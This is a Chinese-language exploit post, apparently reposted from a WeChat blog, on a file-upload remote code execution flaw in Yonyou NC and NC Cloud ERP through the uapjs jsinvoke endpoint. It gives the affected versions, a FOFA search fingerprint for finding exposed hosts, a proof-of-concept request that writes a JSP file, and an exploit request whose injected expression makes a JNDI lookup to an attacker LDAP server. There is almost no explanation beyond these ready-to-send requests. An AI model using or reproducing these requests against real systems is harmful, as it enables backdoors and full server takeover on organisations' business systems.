用友NC uapjs RCE漏洞

admin 2023年7月21日01:35:31评论310 views字数 1711阅读5分42秒阅读模式

用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。

影响范围

NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207

FOFA指纹
app="用友-NC-Cloud"
POC

POST /uapjs/jsinvoke?action=invoke HTTP/1.1Host: XXXXXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: cookiets=1689835770151; JSESSIONID=2BEFF983D118B58B579F45C703152075.serverUpgrade-Insecure-Requests: 1If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTIf-None-Match: W/"1571-1589211696000"Content-Type: application/x-www-form-urlencodedContent-Length: 178
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["12311","webapps/nc_web/123.jsp"]}

效果

用友NC uapjs RCE漏洞

EXP

POST /uapjs/jsinvoke?action=invoke HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 306
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://vps:port/TomcatBypass/TomcatEcho')}","webapps/nc_web/222.jsp"]}

用友NC uapjs RCE漏洞

用友NC uapjs RCE漏洞

原文始发于微信公众号(丁永博的成长日记):用友NC uapjs RCE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月21日01:35:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC uapjs RCE漏洞https://cn-sec.com/archives/1894623.html

发表评论

匿名网友 填写信息